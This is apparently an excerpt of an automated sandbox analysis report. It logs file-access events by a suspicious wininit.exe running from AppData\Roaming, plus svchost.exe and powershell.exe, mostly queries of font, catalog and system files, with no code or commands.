            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
